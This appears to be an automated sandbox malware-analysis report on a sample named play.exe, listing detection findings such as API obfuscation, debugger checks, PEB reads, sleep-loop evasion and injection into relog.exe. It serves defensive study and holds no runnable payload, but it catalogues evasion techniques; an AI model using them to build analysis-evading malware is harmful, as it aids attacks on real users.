Source:	Binary string: wntdll.pdb source: play.exe, play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BE90CB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00BE90CB

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB7150 push esp; retf	0_2_00BB71BF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB9AC0 push esp; ret	0_2_00BB9AC1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB6A13 push ds; iretd	0_2_00BB6A20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA6BC7 push B2A749EEh; iretd	0_2_00BA6BCE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA6B6E push B2A749EEh; iretd	0_2_00BA6BCE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BADB4C push edx; iretd	0_2_00BADB4D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB6CA3 push ebp; retn A5BAh	0_2_00BB6D89
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA8DDA pushfd ; retf	0_2_00BA8E23
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE8505 push ecx; ret	0_2_00BE8518
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA3D70 push eax; ret	0_2_00BA3D72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA2687 push eax; ret	0_2_00BA26D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB3EE3 push FFFFFFD3h; ret	0_2_00BB3FC3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA26D1 push eax; ret	0_2_00BA26D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB4E7C push ecx; ret	0_2_00BB4E83
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA272B push eax; ret	0_2_00BA2736
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BB4F7E push ebp; iretd	0_2_00BB4F82
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BA276E push eax; ret	0_2_00BA2776
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266225F pushad ; ret	0_2_026627F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026627FA pushad ; ret	0_2_026627F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266283D push eax; iretd	0_2_02662858
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD push ecx; mov dword ptr [esp], ecx	0_2_026909B6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0266135F push eax; iretd	0_2_02661369
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03978BAC push esp; retf	4_2_03978C1B
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03977BCD push 0B2B29DEh; ret	4_2_03977BD2
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03969B0C push 9D5CB4DDh; retf	4_2_03969B16
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03969A00 push esp; retf	4_2_039699FF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039699FB push esp; retf	4_2_039699FF
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_0396A836 pushfd ; retf	4_2_0396A87F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_039786FF push ebp; retn A5BAh	4_2_039787E5
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03968623 push B2A749EEh; iretd	4_2_0396862A
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4_2_03977D81 push eax; ret	4_2_03977D82

Source: play.exe

Static PE information: section name: .text entropy: 7.973595489277393

Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\relog.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_026D096E rdtsc

0_2_026D096E

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 3936			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Window / User API: threadDelayed 6035			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\play.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\relog.exe	API coverage: 2.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep count: 3936 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep time: -7872000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep count: 6035 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe TID: 7764	Thread sleep time: -12070000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800	Thread sleep time: -38000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\relog.exe

Code function: 5_2_008CC700 FindFirstFileW,FindNextFileW,FindClose,

5_2_008CC700

Source: relog.exe, 00000005.00000002.4103860914.0000000002C71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|'[Q7
Source: aAqvujXSGNo.exe, 00000006.00000002.4104075019.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: firefox.exe, 00000007.00000002.2356033247.000001917377C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\play.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\play.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_026D096E rdtsc

0_2_026D096E

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BB8373 LdrLoadDll,

0_2_00BB8373

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\play.exe

Code function: 0_2_00BE70C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00BE70C8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\play.exe

0_2_00BE90CB

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h]	0_2_02740274
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268826B mov eax, dword ptr fs:[00000030h]	0_2_0268826B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h]	0_2_02694260
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A250 mov eax, dword ptr fs:[00000030h]	0_2_0274A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A250 mov eax, dword ptr fs:[00000030h]	0_2_0274A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276625D mov eax, dword ptr fs:[00000030h]	0_2_0276625D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696259 mov eax, dword ptr fs:[00000030h]	0_2_02696259
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02718243 mov eax, dword ptr fs:[00000030h]	0_2_02718243
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02718243 mov ecx, dword ptr fs:[00000030h]	0_2_02718243
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A250 mov eax, dword ptr fs:[00000030h]	0_2_0268A250
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268823B mov eax, dword ptr fs:[00000030h]	0_2_0268823B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h]	0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027662D6 mov eax, dword ptr fs:[00000030h]	0_2_027662D6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h]	0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02A0 mov eax, dword ptr fs:[00000030h]	0_2_026A02A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A02A0 mov eax, dword ptr fs:[00000030h]	0_2_026A02A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov ecx, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h]	0_2_027262A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE284 mov eax, dword ptr fs:[00000030h]	0_2_026CE284
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE284 mov eax, dword ptr fs:[00000030h]	0_2_026CE284
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h]	0_2_02710283
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273437C mov eax, dword ptr fs:[00000030h]	0_2_0273437C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02738350 mov ecx, dword ptr fs:[00000030h]	0_2_02738350
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A352 mov eax, dword ptr fs:[00000030h]	0_2_0275A352
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov ecx, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h]	0_2_0271035C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h]	0_2_02712349
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0276634F mov eax, dword ptr fs:[00000030h]	0_2_0276634F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov ecx, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h]	0_2_02768324
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h]	0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C310 mov ecx, dword ptr fs:[00000030h]	0_2_0268C310
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0310 mov ecx, dword ptr fs:[00000030h]	0_2_026B0310
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h]	0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C63FF mov eax, dword ptr fs:[00000030h]	0_2_026C63FF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h]	0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027343D4 mov eax, dword ptr fs:[00000030h]	0_2_027343D4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027343D4 mov eax, dword ptr fs:[00000030h]	0_2_027343D4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov ecx, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h]	0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h]	0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h]	0_2_026983C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027163C0 mov eax, dword ptr fs:[00000030h]	0_2_027163C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C3CD mov eax, dword ptr fs:[00000030h]	0_2_0274C3CD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h]	0_2_0268E388
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B438F mov eax, dword ptr fs:[00000030h]	0_2_026B438F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B438F mov eax, dword ptr fs:[00000030h]	0_2_026B438F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688397 mov eax, dword ptr fs:[00000030h]	0_2_02688397
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BC073 mov eax, dword ptr fs:[00000030h]	0_2_026BC073
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716050 mov eax, dword ptr fs:[00000030h]	0_2_02716050
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692050 mov eax, dword ptr fs:[00000030h]	0_2_02692050
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726030 mov eax, dword ptr fs:[00000030h]	0_2_02726030
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A020 mov eax, dword ptr fs:[00000030h]	0_2_0268A020
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C020 mov eax, dword ptr fs:[00000030h]	0_2_0268C020
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714000 mov ecx, dword ptr fs:[00000030h]	0_2_02714000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h]	0_2_02732000
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h]	0_2_026AE016
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026980E9 mov eax, dword ptr fs:[00000030h]	0_2_026980E9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A0E3 mov ecx, dword ptr fs:[00000030h]	0_2_0268A0E3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027160E0 mov eax, dword ptr fs:[00000030h]	0_2_027160E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C0F0 mov eax, dword ptr fs:[00000030h]	0_2_0268C0F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D20F0 mov ecx, dword ptr fs:[00000030h]	0_2_026D20F0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027120DE mov eax, dword ptr fs:[00000030h]	0_2_027120DE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026880A0 mov eax, dword ptr fs:[00000030h]	0_2_026880A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027560B8 mov eax, dword ptr fs:[00000030h]	0_2_027560B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027560B8 mov ecx, dword ptr fs:[00000030h]	0_2_027560B8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027280A8 mov eax, dword ptr fs:[00000030h]	0_2_027280A8
